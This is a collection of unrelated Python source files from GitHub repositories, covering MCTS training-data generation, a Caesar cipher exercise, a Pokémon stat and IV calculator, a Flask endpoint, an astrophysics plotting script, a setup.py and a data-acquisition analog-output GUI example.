+{"seq_id":"17478133330","text":"import numpy as np\n\ndef get_data(mcts, max_moves=150, nnet=True, prop_thresh=30, verbose=0, return_moves=True):\n \"\"\"\n Gets the data that can be used to train an agent (typically a neural net). Uses MCTS\n to generate policies and rewards that are then returned.\n\n Params\n ------\n \n mcts: MCTS\n The monte carlo tree search object to use.\n\n max_moves: int, default=150\n The maximum number of moves the game can make before considering the game a draw.\n\n nnet: bool, default=False\n Whether the data should e acceptable to a neural network.\n\n prop_thresh: int, default=50\n Proportionality threshold for the prop constant in the mcts policy. The threshold defines the move\n after which the MCTS starts behaving greedily.\n\n verbose: int, default=0\n The verbosity of the state. Accepts 0 or 1 (verbose or not).\n\n return_move: bool, default=False\n Whether to return the number of moves as well as the data.\n\n Returns\n -------\n\n data: list\n The encoded data, containing training examples in the form [(state, target_pi, target_value),...].\n\n moves: int, optional\n The number of moves played. Only returns if return_move is True.\n \"\"\"\n memory = [] # place to store states as we play\n possible_moves = mcts.action_space\n game= mcts.game\n board_state = game.state()\n\n for move in range(max_moves):\n # get the game state and current player for the nn\n # TODO: allow for symmetric game\n # states = game.get_symmetries(nnet)\n state = game.state(nnet)\n cur_play = game.current_player()\n\n # use mcts to get a policy\n prop = int(move < prop_thresh)\n mcts.train()\n policy = mcts.get_policy(prop=prop)\n\n # choose an action based off this state\n act = np.random.choice(possible_moves, p=policy)\n\n # store the state, policy, and player\n #for state in states:\n # memory.append([state, policy, cur_play])\n memory.append([state, policy, cur_play])\n\n # perform this action\n s = game.state()\n game.move(act)\n mcts.update()\n if verbose:\n print(mcts.get_Qsa(s, act), mcts.get_Nsa(s, act), game.engine.result(), game.current_player())\n print(game.board())\n \n\n # check if the game is over\n v = game.winner()\n if v !=0:\n # game over state\n # it's currently the move of the loser, so v=-1\n # all states that have this player should have a v=-1\n # all states that have the other player should have v=1\n # so check the current player\n cur_play = game.current_player()\n # so if cur_play = sa.cur_play, return v=-1\n # if cur_play != sa.cur_play, return v=1\n data = [(x[0], x[1], v if x[2] == cur_play else -v) for x in memory]\n # reset the game\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data\n # max moves was reached\n # here the outcome is a draw\n if verbose:\n print(\"Game ended in draw, max_moves was met\")\n v = 0\n data = [(x[0], x[1], v) for x in memory]\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data","repo_name":"jasonrobwebster/alphazero-clone","sub_path":"coach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"}
+{"seq_id":"8047754542","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(message: str, shift: int):\n \"\"\"Encode a message using a Caesar cipher.\"\"\"\n new_message: str = \"\"\n if shift > 26: # If shift = 26 than it is the same letter\n shift %= 26 # Skips useless laps (lap = 26) and finds useful shift\n for element in message: # Loop checks every letter per iteration\n if ord(element) > 122 or 97 > ord(element): # Elements that not from a...z\n new_message += element # Leave item the same\n else:\n new_element = ord(element) + shift\n if new_element > 122:\n new_element = 96 + (new_element - 122) # Searches for element in range from a...z\n new_message += chr(new_element) # Adds new element\n else:\n new_message += chr(new_element)\n return new_message\n\n\nif __name__ == '__main__':\n print(encode(\"i like turtles\", 6)) # -> o roqk zaxzrky\n print(encode(\"o roqk zaxzrky\", 20)) # -> i like turtles\n print(encode(\"example\", 1)) # -> fybnqmf\n print(encode(\"don't change\", 0)) # -> don't change\n print(encode('the quick brown fox jumps over the lazy dog.', 7)) # -> aol xbpjr iyvdu mve qbtwz vcly aol shgf kvn.\n","repo_name":"aKaidalov/iti0102-2022","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"72500347953","text":"\"\"\"Module instantiating a slithering animal\"\"\"\nfrom datetime import date\n\nclass Hognose:\n \"\"\"Class representing an animal\"\"\"\n def __init__(self, name, species):\n # Establish the properties of each animal\n # with a default value\n self.name = name\n self.species = species\n self.date_added = date.today()\n self.slithering = True\nbaby_cakes = Hognose(\"Baby Cakes\", \"Southern Hognose snake\")\nprint(baby_cakes)\n","repo_name":"dontcallmeplath/petting-zoo","sub_path":"slithering/Hognose.py","file_name":"Hognose.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8268783834","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom fractions import Fraction\nfrom typing import Optional\n\nimport voluptuous as vlps\n\nfrom pkmn_stat_type import StatType, GenStatType\nfrom utils import enum_const_dict, multiplier_range_frac, IntRange, IntOrRange_T, FracRange, FracOrRange_T,\\\n\tFloatOrRange_T\nfrom nature import Nature\n\n\nLVL_RANGE = IntRange(1, 100)\n# Used in formulas\nLVL_NORM = 100\n\n\nclass BaseStats(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass IVRanges(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass EVs(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass Stats(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStats(enum_const_dict(GenStatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStatsNormalized(enum_const_dict(GenStatType, FloatOrRange_T)):\n\tpass\n\n\n@dataclass(slots=True)\nclass StatData:\n\tvalue: int = None\n\tiv: Optional[IntOrRange_T] = None\n\tev: Optional[IntOrRange_T] = None\n\n\t@classmethod\n\tdef bare_val(cls, value: int = None) -> StatData:\n\t\treturn cls(value=value, ev=0)\n\n\nclass StatsData(enum_const_dict(StatType, StatData)):\n\t...\n\n\n# Structure like:\n# {\n# StatType.HP: 100, # `value` argument\n# StatType.ATK: {\"value\": 70, \"ev\": 252},\n# StatType.DEF: {\"value\": 90, \"ev\": None, \"iv\": IntRange(4, 7)},\n# ...\n# }\nInputStatsData_T = dict[\n\tStatType,\n\tIntOrRange_T | None | dict[\n\t\tstr,\n\t\tIntOrRange_T | None\n\t]\n]\n\n\nNatureMult_T = int | Fraction\n\n\nclass Stat:\n\tBASE_RANGE = IntRange(0, 256)\n\tIV_RANGE = IntRange(0, 31)\n\tEV_RANGE = IntRange(0, 252)\n\n\tDEFAULT_MULT = 1\n\tINCREASED_MULT = Fraction(11, 10)\n\tDECREASED_MULT = Fraction(9, 10)\n\tMULT_RANGE = FracRange(DECREASED_MULT, INCREASED_MULT)\n\tPOSSIBLE_MULTS = DEFAULT_MULT, INCREASED_MULT, DECREASED_MULT\n\n\t@classmethod\n\tdef get_mult(cls, stat_type: StatType, nature: Nature):\n\t\tif stat_type == StatType.HP:\n\t\t\treturn None\n\t\telif nature.is_simple():\n\t\t\treturn cls.DEFAULT_MULT\n\t\telif stat_type == nature.increased:\n\t\t\treturn cls.INCREASED_MULT\n\t\telif stat_type == nature.decreased:\n\t\t\treturn cls.DECREASED_MULT\n\t\telse:\n\t\t\treturn cls.DEFAULT_MULT\n\n\tdef __init__(\n\t\tself,\n\t\ttype_: StatType,\n\t\tbase: int,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: int = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t):\n\t\tself._type = vlps.Schema(StatType)(type_)\n\t\tself._base = vlps.Schema(vlps.All(int, self.BASE_RANGE.in_validator))(base)\n\t\tself._lvl = vlps.Schema(vlps.Maybe(vlps.All(int, LVL_RANGE.in_validator)))(lvl)\n\t\tself._iv = vlps.Schema(vlps.Maybe(\n\t\t\tvlps.All(\n\t\t\t\tvlps.Any(IntRange, vlps.All(int, vlps.Coerce(IntRange))),\n\t\t\t\tself.IV_RANGE.in_validator,\n\t\t\t\tIntRange.is_straight_validator\n\t\t\t)\n\t\t))(iv)\n\t\tself._ev = vlps.Schema(vlps.Maybe(vlps.All(int, self.EV_RANGE.in_validator)))(ev)\n\n\t\tif type_ == StatType.HP:\n\t\t\t# For HP multiplier always is None (not used), but for protection\n\t\t\t# against gross typos:\n\t\t\tif mult is not None and mult != self.DEFAULT_MULT:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\t\tself._mult = None\n\t\telif mult is None:\n\t\t\tself._mult = None\n\t\telse:\n\t\t\tself._mult = vlps.Schema(vlps.In(self.POSSIBLE_MULTS))(mult)\n\n\t\tif val is None:\n\t\t\tself._val = None\n\t\t\ttry:\n\t\t\t\tself._val = self.get_val()\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._val = vlps.Schema(vlps.All(int, self.calc_val(\n\t\t\t\t\tself._type,\n\t\t\t\t\tself._base,\n\t\t\t\t\tself._iv,\n\t\t\t\t\tself._ev,\n\t\t\t\t\tself._lvl,\n\t\t\t\t\tself._mult\n\t\t\t\t).in_validator))(val)\n\t\t\texcept vlps.Error as e:\n\t\t\t\traise ValueError(f\"{self._type} {e}\")\n\n\t@property\n\tdef type(self) -> StatType:\n\t\treturn self._type\n\n\t@property\n\tdef base(self) -> int:\n\t\treturn self._base\n\n\t@classmethod\n\tdef _calc_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T\n\t) -> IntOrRange_T:\n\t\treturn (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\n\t@classmethod\n\tdef _calc_non_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: FracOrRange_T\n\t) -> IntOrRange_T:\n\t\tval = (2*base + iv + ev//4) * lvl // LVL_NORM + 5\n\t\tif mult != cls.DEFAULT_MULT:\n\t\t\tval = val * mult.numerator // mult.denominator\n\n\t\treturn val\n\n\t@classmethod\n\tdef _calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: Optional[FracOrRange_T] # None for HP.\n\t) -> IntOrRange_T:\n\t\tif type_ == StatType.HP:\n\t\t\treturn cls._calc_hp_val(base, lvl, iv, ev)\n\t\telse:\n\t\t\treturn cls._calc_non_hp_val(base, lvl, iv, ev, mult)\n\n\t@classmethod\n\tdef calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T = None,\n\t\tiv: IntOrRange_T = None,\n\t\tev: IntOrRange_T = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\tif lvl is None:\n\t\t\tlvl = LVL_RANGE\n\n\t\tif iv is None:\n\t\t\tiv = cls.IV_RANGE\n\n\t\tif ev is None:\n\t\t\tev = cls.EV_RANGE\n\n\t\tif type_ == StatType.HP:\n\t\t\tif mult is not None:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\telif mult is None:\n\t\t\tmult = cls.MULT_RANGE\n\n\t\treturn cls._calc_val(type_, base, lvl, iv, ev, mult)\n\n\tdef get_val(\n\t\tself,\n\t\tlvl: Optional[IntOrRange_T] = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\t\"\"\"Get stat value.\"\"\"\n\t\tif lvl is None:\n\t\t\tlvl = self._lvl\n\n\t\tif iv is None:\n\t\t\tiv = self._iv\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tmult = self._mult\n\n\t\treturn self.calc_val(self._type, self._base, lvl, iv, ev, mult)\n\n\tdef get_iv(\n\t\tself,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None # None for self value\n\t) -> IntRange:\n\t\tif lvl is None:\n\t\t\tif self._lvl is None:\n\t\t\t\traise ValueError(\"Lvl must be specified\")\n\t\t\tlvl = self._lvl\n\n\t\tif val is None:\n\t\t\tif self._val is None:\n\t\t\t\traise ValueError(\"Stat value must be specified\")\n\t\t\tval = self._val\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tif self._mult is None and self._type != StatType.HP:\n\t\t\t\traise ValueError(\"Nature multiplier must be specified\")\n\t\t\tmult = self._mult\n\n\t\t# HP = (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\t\t# NON_HP = ((2*base + iv + ev//4) * lvl // LVL_NORM + 5) * mult\n\n\t\tif self._type == StatType.HP:\n\t\t\trange_ = val - 10 - lvl\n\t\telif mult != self.DEFAULT_MULT:\n\t\t\trange_ = multiplier_range_frac(mult, val) - 5\n\t\telse:\n\t\t\trange_ = val - 5\n\n\t\trange_ = multiplier_range_frac(Fraction(lvl, LVL_NORM), range_)\n\t\trange_ -= 2*self._base + ev//4\n\t\ttry:\n\t\t\trange_.clamp(self.IV_RANGE)\n\t\texcept ValueError as e:\n\t\t\traise ValueError(f\"Calculated {self._type.name} IVs are impossible: {e}\") from e\n\n\t\treturn range_\n\n\ndef main():\n\tlvl = 78\n\n\t# stats = [\n\t# \tStat(StatType.HP, base=108, iv=24, lvl=lvl, ev=74),\n\t# \tStat(StatType.ATK, base=130, iv=12, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT),\n\t# \tStat(StatType.DEF, base=95, iv=30, lvl=lvl, ev=91),\n\t# \tStat(StatType.SPATK, base=80, iv=16, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT),\n\t# \tStat(StatType.SPDEF, base=85, iv=23, lvl=lvl, ev=84),\n\t# \tStat(StatType.SPEED, base=102, iv=5, lvl=lvl, ev=23)\n\t# ]\n\t# for stat in stats:\n\t# \tprint(f\"{stat._type.name}: {stat.get_val(lvl)}\")\n\n\tstats = [\n\t\tStat(StatType.HP, base=108, val=289, lvl=lvl, ev=74), # 24\n\t\tStat(StatType.ATK, base=130, val=278, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT), # 12\n\t\tStat(StatType.DEF, base=95, val=193, lvl=lvl, ev=91), # 30\n\t\tStat(StatType.SPATK, base=80, val=135, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT), # 16\n\t\tStat(StatType.SPDEF, base=85, val=171, lvl=lvl, ev=84), # 23\n\t\tStat(StatType.SPEED, base=102, val=171, lvl=lvl, ev=23) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tstats = [\n\t\tStat(StatType.HP, base=70, val=54, lvl=17), # 24\n\t\tStat(StatType.ATK, base=110, val=45, lvl=17), # 12\n\t\tStat(StatType.DEF, base=180, val=60, lvl=17, mult=Stat.DECREASED_MULT), # 30\n\t\tStat(StatType.SPATK, base=60, val=28, lvl=17), # 16\n\t\tStat(StatType.SPDEF, base=60, val=30, lvl=17, mult=Stat.INCREASED_MULT), # 23\n\t\tStat(StatType.SPEED, base=50, val=22, lvl=17) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tlvl = 50\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\tlvl = 100\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\n\t# sd = StatsData({\n\t# \tStatType.HP: StatData(51),\n\t# \tStatType.ATK: StatData(17),\n\t# \tStatType.DEF: StatData(39),\n\t# \tStatType.SPATK: StatData(15),\n\t# \tStatType.SPDEF: StatData(18),\n\t# \tStatType.SPEED: StatData(51)\n\t# })\n\t# pretty_print(sd)\n\n\t# print(multiplier_range_frac(Fraction(76, 100), 200))\n\t# print()\n\t# print(multiplier_range_frac(Fraction(13, 100), 51))\n\t#\n\t# sd = StatsData({\n\t# \tst: StatData()\n\t# \tfor st in StatType\n\t# })\n\t# pretty_print(sd)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Avorthoren/pkmn_py","sub_path":"pkmn_stat.py","file_name":"pkmn_stat.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"4586284056","text":"from flask import Flask, render_template, jsonify\nimport json\nfrom crime import SeattlePDApi\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', title=\"Home\")\n\n\n@app.route('/api/raw')\n@app.route('/api/raw/')\ndef api_raw(limit=20):\n path = r'C:\\dev\\jim\\seattle_crime\\exports\\raw_json_20181102.json'\n with open(path, 'r') as _f:\n data = json.load(_f)\n _f.close()\n \n if limit:\n data = data[:limit]\n return jsonify(data)\n\n@app.route('/api/bydate')\ndef crime_by_date():\n s = SeattlePDApi()\n data = s.get_crimes_by_date()\n return jsonify(data)","repo_name":"cryocaustik/PyApiToHtml","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8059211252","text":"from load_modules import *\n\n#run_type = 1 # indiv script selection 0 = save only / 1 = show only / 2 = save and show\n\nCoM_trace = np.empty([1,4])# np.empty(4) # first 3 columns = coords, 4th = time/scale factor\n\ni = 0\nwhile True:\n\ttry:\n\t\tfname = get_snap_filename('../Output', i*10)\n\t\tR = np.asarray(get_snap_data(fname, 1, 'Coordinates'))\n#\t\tprint(fname)\n\t\tn = get_attribute(fname,'NumPart_ThisFile')[1]\n\t\tM = np.full(n, 1)\n\t\tR_CoM = find_CoM(R, M)\n\t\ta = get_attribute(fname,'Time')\n\t\tstack = np.hstack((R_CoM,a))\n\t\tCoM_trace = np.append(CoM_trace, [stack], axis=0)\n#\t\tprint(CoM_trace[i])\n\texcept(KeyError, OSError, NameError, UnboundLocalError, IOError):\n\t\tbreak\n\telse:\n i += 1\n#print(CoM_trace)\n\n#projection in xy, xz, yz planes\n\nfig1 = plt.figure()\nax = fig1.add_subplot(projection='3d')\nax.scatter3D(CoM_trace[:,0], CoM_trace[:,1], CoM_trace[:,2])\nplt.title('Plot tracing halo CoM location through time [IC]')\nax.set_xlabel(r'$x\\; [kpc]$')\nax.set_ylabel(r'$y\\; [kpc]$')\nax.set_zlabel(r'$z\\; [kpc]$')\n\n\n#### BULK RUN OPTIONS ####\n\nif run_type == 0 or run_type == 2:\n\tfig1.savefig('./IC_halo_plots/IC_halo_CoM_trace.pdf') \n\nif run_type == 1 or run_type == 2:\n plt.show()\n\n\n","repo_name":"UONGGuy/DynamicalFriction_on_SMBH_scripts","sub_path":"halo_scripts/halo_CoM_trace.py","file_name":"halo_CoM_trace.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"74244491954","text":"import setuptools\nimport os\n\n# Open and read README.md\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n# Open and read requirements.txt\nbaseDir = os.path.dirname(os.path.realpath(__file__))\nrequirements_path = baseDir + '/requirements.txt'\ninstall_requires = []\nif os.path.isfile(requirements_path):\n with open(requirements_path, 'r') as f:\n install_requires = f.read().splitlines()\n\nsetuptools.setup(\n name=\"BeautifulSites4\",\n version=\"1.1.1-alpha\",\n author=\"HipyCas\",\n author_email=\"hipycas+python@gmail.com\",\n description=\"An implementation of BeautifulSoup4 for some popular webpages\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/HipyCas/BeautifulSites\",\n packages=setuptools.find_packages(),\n install_requires=install_requires,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"HipyCas/BeautifulSites","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"9797828346","text":"from __future__ import absolute_import, division, print_function\n\nimport math\n\nfrom builtins import * # @UnusedWildImport\nfrom tkinter import messagebox\n\nfrom mcculw import ul\nfrom mcculw.enums import Status, FunctionType, ScanOptions\nfrom examples.ui.uiexample import UIExample\nfrom examples.props.ao import AnalogOutputProps\nfrom mcculw.ul import ULError\nimport tkinter as tk\n\n\nclass ULAO04(UIExample):\n def __init__(self, master=None):\n super(ULAO04, self).__init__(master)\n\n self.board_num = 0\n self.ao_props = AnalogOutputProps(self.board_num)\n\n self.create_widgets()\n\n def start_scan(self):\n # Build the data array\n self.low_chan = self.get_low_channel_num()\n self.high_chan = self.get_high_channel_num()\n self.num_chans = self.high_chan - self.low_chan + 1\n\n if self.low_chan > self.high_chan:\n messagebox.showerror(\n \"Error\",\n \"Low Channel Number must be greater than or equal to High \"\n \"Channel Number\")\n self.set_ui_idle_state()\n return\n\n points_per_channel = 1000\n rate = 1000\n num_points = self.num_chans * points_per_channel\n scan_options = (ScanOptions.BACKGROUND |\n ScanOptions.CONTINUOUS | ScanOptions.SCALEDATA)\n ao_range = self.ao_props.available_ranges[0]\n\n self.memhandle = ul.scaled_win_buf_alloc(num_points)\n\n # Check if the buffer was successfully allocated\n if not self.memhandle:\n messagebox.showerror(\"Error\", \"Failed to allocate memory\")\n self.start_button[\"state\"] = tk.NORMAL\n return\n\n try:\n data_array = self.memhandle_as_ctypes_array_scaled(\n self.memhandle)\n frequencies = self.add_example_data(\n data_array, ao_range, self.num_chans, rate,\n points_per_channel)\n\n self.recreate_freq_frame()\n self.display_signal_info(frequencies)\n\n ul.a_out_scan(\n self.board_num, self.low_chan, self.high_chan, num_points,\n rate, ao_range, self.memhandle, scan_options)\n\n # Start updating the displayed values\n self.update_displayed_values()\n except ULError as e:\n self.show_ul_error(e)\n self.set_ui_idle_state()\n return\n\n def display_signal_info(self, frequencies):\n for channel_num in range(self.low_chan, self.high_chan + 1):\n curr_row = channel_num - self.low_chan\n self.freq_labels[curr_row][\"text\"] = str(\n frequencies[curr_row]) + \" Hz\"\n\n def add_example_data(self, data_array, ao_range, num_chans,\n rate, points_per_channel):\n # Calculate frequencies that will work well with the size of the array\n frequencies = []\n for channel_num in range(0, num_chans):\n frequencies.append(\n (channel_num + 1) / (points_per_channel / rate))\n\n # Calculate an amplitude and y-offset for the signal\n # to fill the analog output range\n amplitude = (ao_range.range_max - ao_range.range_min) / 2\n y_offset = (amplitude + ao_range.range_min) / 2\n\n # Fill the array with sine wave data at the calculated frequencies.\n # Note that since we are using the SCALEDATA option, the values\n # added to data_array are the actual voltage values that the device\n # will output\n data_index = 0\n for point_num in range(0, points_per_channel):\n for channel_num in range(0, num_chans):\n freq = frequencies[channel_num]\n value = amplitude * math.sin(\n 2 * math.pi * freq * point_num / rate) + y_offset\n data_array[data_index] = value\n data_index += 1\n\n return frequencies\n\n def update_displayed_values(self):\n # Get the status from the device\n status, curr_count, curr_index = ul.get_status(\n self.board_num, FunctionType.AOFUNCTION)\n\n # Display the status info\n self.update_status_labels(status, curr_count, curr_index)\n\n # Call this method again until the stop button is pressed\n if status == Status.RUNNING:\n self.after(100, self.update_displayed_values)\n else:\n # Free the allocated memory\n ul.win_buf_free(self.memhandle)\n self.set_ui_idle_state()\n\n def update_status_labels(self, status, curr_count, curr_index):\n if status == Status.IDLE:\n self.status_label[\"text\"] = \"Idle\"\n else:\n self.status_label[\"text\"] = \"Running\"\n\n self.index_label[\"text\"] = str(curr_index)\n self.count_label[\"text\"] = str(curr_count)\n\n def recreate_freq_frame(self):\n low_chan = self.low_chan\n high_chan = self.high_chan\n\n new_freq_frame = tk.Frame(self.freq_inner_frame)\n\n curr_row = 0\n self.freq_labels = []\n for chan_num in range(low_chan, high_chan + 1):\n curr_row += 1\n channel_label = tk.Label(new_freq_frame)\n channel_label[\"text\"] = (\n \"Channel \" + str(chan_num) + \" Frequency:\")\n channel_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n freq_label = tk.Label(new_freq_frame)\n freq_label.grid(row=curr_row, column=1, sticky=tk.W)\n self.freq_labels.append(freq_label)\n\n self.freq_frame.destroy()\n self.freq_frame = new_freq_frame\n self.freq_frame.grid()\n\n def stop(self):\n ul.stop_background(self.board_num, FunctionType.AOFUNCTION)\n\n def exit(self):\n self.stop()\n self.master.destroy()\n\n def set_ui_idle_state(self):\n self.high_channel_entry[\"state\"] = tk.NORMAL\n self.low_channel_entry[\"state\"] = tk.NORMAL\n self.start_button[\"command\"] = self.start\n self.start_button[\"text\"] = \"Start\"\n\n def start(self):\n self.high_channel_entry[\"state\"] = tk.DISABLED\n self.low_channel_entry[\"state\"] = tk.DISABLED\n self.start_button[\"command\"] = self.stop\n self.start_button[\"text\"] = \"Stop\"\n self.start_scan()\n\n def get_low_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.low_channel_entry.get())\n except ValueError:\n return 0\n\n def get_high_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.high_channel_entry.get())\n except ValueError:\n return 0\n\n def validate_channel_entry(self, p):\n if p == '':\n return True\n try:\n value = int(p)\n if(value < 0 or value > self.ao_props.num_chans - 1):\n return False\n except ValueError:\n return False\n\n return True\n\n def create_widgets(self):\n '''Create the tkinter UI'''\n example_supported = (\n self.ao_props.num_chans > 0\n and self.ao_props.supports_scan)\n\n if example_supported:\n main_frame = tk.Frame(self)\n main_frame.pack(fill=tk.X, anchor=tk.NW)\n\n if self.ao_props.num_chans > 1:\n channel_vcmd = self.register(self.validate_channel_entry)\n\n curr_row = 0\n low_channel_entry_label = tk.Label(main_frame)\n low_channel_entry_label[\"text\"] = \"Low Channel Number:\"\n low_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.low_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.low_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n high_channel_entry_label = tk.Label(main_frame)\n high_channel_entry_label[\"text\"] = \"High Channel Number:\"\n high_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.high_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.high_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n initial_value = min(self.ao_props.num_chans - 1, 3)\n self.high_channel_entry.delete(0, tk.END)\n self.high_channel_entry.insert(0, str(initial_value))\n\n scan_info_group = tk.LabelFrame(\n self, text=\"Scan Information\", padx=3, pady=3)\n scan_info_group.pack(fill=tk.X, anchor=tk.NW, padx=3, pady=3)\n\n scan_info_group.grid_columnconfigure(1, weight=1)\n\n curr_row += 1\n status_left_label = tk.Label(scan_info_group)\n status_left_label[\"text\"] = \"Status:\"\n status_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.status_label = tk.Label(scan_info_group)\n self.status_label[\"text\"] = \"Idle\"\n self.status_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n index_left_label = tk.Label(scan_info_group)\n index_left_label[\"text\"] = \"Index:\"\n index_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.index_label = tk.Label(scan_info_group)\n self.index_label[\"text\"] = \"-1\"\n self.index_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n count_left_label = tk.Label(scan_info_group)\n count_left_label[\"text\"] = \"Count:\"\n count_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.count_label = tk.Label(scan_info_group)\n self.count_label[\"text\"] = \"0\"\n self.count_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n self.freq_inner_frame = tk.Frame(scan_info_group)\n self.freq_inner_frame.grid(\n row=curr_row, column=0, columnspan=2, sticky=tk.W)\n\n self.freq_frame = tk.Frame(self.freq_inner_frame)\n self.freq_frame.grid()\n\n button_frame = tk.Frame(self)\n button_frame.pack(fill=tk.X, side=tk.RIGHT, anchor=tk.SE)\n\n self.start_button = tk.Button(button_frame)\n self.start_button[\"text\"] = \"Start\"\n self.start_button[\"command\"] = self.start\n self.start_button.grid(row=0, column=0, padx=3, pady=3)\n\n quit_button = tk.Button(button_frame)\n quit_button[\"text\"] = \"Quit\"\n quit_button[\"command\"] = self.exit\n quit_button.grid(row=0, column=1, padx=3, pady=3)\n\n\nif __name__ == \"__main__\":\n # Start the example\n 